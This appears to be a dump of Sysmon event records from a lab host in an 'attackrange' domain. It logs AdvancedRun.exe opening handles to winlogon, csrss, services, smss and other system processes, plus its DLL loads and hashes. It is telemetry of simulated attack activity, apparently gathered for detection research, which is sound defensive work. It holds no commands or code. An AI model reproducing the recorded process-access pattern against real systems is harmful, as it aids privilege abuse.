19:56:09.227{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.227{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.227{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.227{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057060Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.227{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057059Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.226{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004057058Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.226{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004057057Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.226{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057056Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.219{834264DD-DAE4-61EA-0C00-000000002702}6524660C:\Windows\system32\lsass.exe{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004057055Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.214{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057054Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.210{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.209{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057052Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.208{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057051Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.207{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057050Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.207{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.206{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.206{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057047Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.206{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057046Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.205{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057045Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.204{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057044Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.204{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057043Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.204{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057042Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.203{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057041Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.203{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057040Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.203{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057039Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.202{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057038Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.202{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057037Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.202{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057036Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.201{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057035Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.201{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057034Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.201{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057033Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.201{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057032Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.201{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 